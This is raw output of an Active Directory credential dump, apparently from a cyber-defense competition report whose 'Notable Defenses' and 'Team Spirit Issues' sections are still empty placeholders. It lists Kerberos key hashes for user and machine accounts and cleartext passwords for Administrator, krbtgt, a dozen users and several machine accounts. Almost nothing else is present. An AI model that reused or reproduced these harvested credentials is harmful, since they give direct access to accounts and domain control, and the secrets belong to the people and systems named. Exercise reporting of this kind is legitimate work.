ricardo.peterson:aes256-cts-hmac-sha1-96:f09f2eabb673d8cdf8562cbb66a3460ae5c5a7f265c1a605dd72d531c9bdacc5
ricardo.peterson:aes128-cts-hmac-sha1-96:23003fbfc44f88426f42090dc60d7285
ricardo.peterson:des-cbc-md5:9b2cda9dbce33ea8
alison.taylor:aes256-cts-hmac-sha1-96:4282b56b78a53dc30cbacfb3fef6bc539e989998ed46231ad22ee4ac031ada8d
alison.taylor:aes128-cts-hmac-sha1-96:a288551d88d2be139c1e517bf875ef1a
alison.taylor:des-cbc-md5:c78c7676320e9298
nicole.galvan:aes256-cts-hmac-sha1-96:93f9a2db67cb146e495f7b8b4b39712873139f3db9749c058f46024ad4c5dbd7
nicole.galvan:aes128-cts-hmac-sha1-96:8d084143fc928cfadb4c9c3f5a799392
nicole.galvan:des-cbc-md5:58f20d8067cdbcd5
lance.hickman:aes256-cts-hmac-sha1-96:a8fd2186d46fe1b3a984fa7e415e0c00625fab85b9db036edcafa351a8eb3dd1
lance.hickman:aes128-cts-hmac-sha1-96:6684cdc867c054e5f415cd84ce9e8a12
lance.hickman:des-cbc-md5:79cd5b866ea7a2f1
brad.chapman:aes256-cts-hmac-sha1-96:7a0a53b77f663c4cb8e0a9554fd6a96fd25bf90bebd59498a07feb8c87752443
brad.chapman:aes128-cts-hmac-sha1-96:7643649a3ee5f5a5d766938c05db9d94
brad.chapman:des-cbc-md5:b03770ce62624015
rachel.johnson:aes256-cts-hmac-sha1-96:4ebe2e848d9484726a3d83e78f3108b9e984387c81878880370a7205626af3f3
rachel.johnson:aes128-cts-hmac-sha1-96:dd9afa69f7f636e5879e18b34525f9ae
rachel.johnson:des-cbc-md5:376b86e6375b5102
brenda.klein:aes256-cts-hmac-sha1-96:104350f1e5b38bb60d74bf84e7110aacae372e7f1383e09ed2bdad0125b6022d
brenda.klein:aes128-cts-hmac-sha1-96:d73dce98e8cd5e6786b6a89797719882
brenda.klein:des-cbc-md5:a45d701aa434cb4c
sharon.hill:aes256-cts-hmac-sha1-96:8ba782f1ee61bb2501747cd0be2f9a5b7e8316ff382287c246515211915f9aab
sharon.hill:aes128-cts-hmac-sha1-96:d56e129740c0141037bd8d3806f86ddf
sharon.hill:des-cbc-md5:d9689e73e3d367f1
taco:aes256-cts-hmac-sha1-96:3c153d384b174a6199d1abe68e5b733b78456504836d73a5e7228ed3221bb13a
taco:aes128-cts-hmac-sha1-96:fc7ab20fd901d8e7d9b43f1e727b79ea
taco:des-cbc-md5:0bbc51f7b0f2df58
AD$:aes256-cts-hmac-sha1-96:0d3bb38151a68c583c29a644846249a84bc5c8d93431aca631379908a2674607
AD$:aes128-cts-hmac-sha1-96:7f53fd2fb6f654eeaf9b6434ef21c934
AD$:des-cbc-md5:8349191c58464352
NEWS$:aes256-cts-hmac-sha1-96:9cf4e9ac3ecbc8a2a41a89f08cd9fa236c9e7925e5defe68d809ca59c1f38659
NEWS$:aes128-cts-hmac-sha1-96:5f8a103d79c5ac65eac8a99e5a468d00
NEWS$:des-cbc-md5:388abcad15feef37
WSTN$:aes256-cts-hmac-sha1-96:e8f4188aa8b40ce1eb990da5688bbd9b5d7ec743b1bafb285aafc683e9518e50
WSTN$:aes128-cts-hmac-sha1-96:8d19cf1d61156971474622432175cc88
WSTN$:des-cbc-md5:76b63498e6408061
WWW$:aes256-cts-hmac-sha1-96:a497b58c434064eb235ae8c20ac80932ba52562eb966b9ffc89210e01c72b956
WWW$:aes128-cts-hmac-sha1-96:3300be710560a504e54f3985956c839c
WWW$:des-cbc-md5:02a898df10ba2673
LTV$:aes256-cts-hmac-sha1-96:93b284b86065eee1dd1c98808a3c5f3e378514aef4f297fe8cd5c768c459422a
LTV$:aes128-cts-hmac-sha1-96:ad28bb708927906354d3e3da8bc2bda6
LTV$:des-cbc-md5:51b913f1fb6d7068
[*] ClearText passwords grabbed
Administrator:CLEARTEXT:ADpheswu_roP243uxo
krbtgt:CLEARTEXT:0x2b13a7856ec5387eea254c1a1ffc9c0e62f74962f91265783ead668093811ebd03b91a63df3e04de0b802d81374cd06798ae115615bde056f7e7e56e6b34ce6108c0518de3ce1a819dae02c2cc32ac79c9f5ec987da2a9c0e8450f096f006511c94eb2be19d98b74a68d9e294d04f0e99cd6a803c6dfd70e93d784b7b6e531977815db13f2d25856b08f55e35706ed88629b15a01df7f6e051beb136c8dffcc1bc5635e228739f14a3bfff81940d073e6e349d2c10c59144856e91227acbacccbc1fff2849fed8898ca96847da4711986d30323c4ab5c9b38924b4ce0d51ca38382c79d409d430a43d6cfcb4526543272681913261a9836e354fe84f81f1b6e15ac4fc8184041f338a6141ea475fb3d576609022af814a06b773589ebfb539c55e7b78a05731534466d247d2fd4da3691c46889752170f0a88da100c15da44350cefb5af2c2d6592ba871151ca718c5eed0baf4df182a19f6b2871ce0168d492a2a4349c28eaa82d2246c6364be8b8e40f878330303f6b1cc03631be8d56e6adc015fd2f620935a98a100c00f1737553d5a8791a68ff8e6c2a5340005be39112a2b432921de08f22535a7dc8e7311c5f5f03383d87c8dafe2bdafddc8ef16baf6b70365c081ec0ff4b27163f135a05cb605b243b77de989d8496d06bf2c437a4892b48e86340862468cea3124dc88a77b6887ae32c1b78f0374a5ecc969b734e
cdc:CLEARTEXT:ADkeCr7Y&BRAst0mlb
david.ward:CLEARTEXT:vin938fec
matthew.hansen:CLEARTEXT:yuk268lik
jeffrey.harper:CLEARTEXT:fey415laq
ricardo.peterson:CLEARTEXT:gag429gaj
alison.taylor:CLEARTEXT:lim321yen
nicole.galvan:CLEARTEXT:cis484non
lance.hickman:CLEARTEXT:mug534cem
brad.chapman:CLEARTEXT:bish0p
rachel.johnson:CLEARTEXT:vanoye10
brenda.klein:CLEARTEXT:dimple18
sharon.hill:CLEARTEXT:Abby21
taco:CLEARTEXT:cdc
NEWS$:CLEARTEXT:MM%4nbD8?pggA]wNN*+,_WRY,75@RovfaczbYlSqyP8vbN%S[RCt;j+_uJpk(AI3ycxs;.Y;Kg8I)Gh>:^C&,%B,m,Hc<aRbtcjNpEel]q)RLBcbda:okbjj
WSTN$:CLEARTEXT:#4<<m*)G1WgYvXM\sc+2JCpa;I4v,FEIuyj:T(W.0Zofj/f4s#P/jscS3ZG?+K_lO,uAF=g&%vY6sbkBKD4e(5L>d&L,]WG3<pxoz^P<9UP13N^cVP7jl9qP
WWW$:CLEARTEXT:/%7sk%we6N3c&,vPUbhYWPkM&km+zj8P>\.t8Ot:jOszb%BMSOo6&/97:U.)4o1Wu(nnR])=)ew\fYCxDz\n45NsYig-:4zLory(>Nv6[>R^0;2nb\Nu70B_
LTV$:CLEARTEXT:dqF%HsQ[),z.bX6H;+Pqw+T9z^(8:ZX9f0PQ%P]+(\v-qz8&Uh1ei5vSRFiNI>v#f7C*7ulpWv_ml2]jX>em=c1ZeV2?e1#SLLsfR#9ZwaqsL?iI_P-e*0#/
[*] Cleaning up... 
Notable Defenses
Add content here...
Team Spirit Issues
Add content here...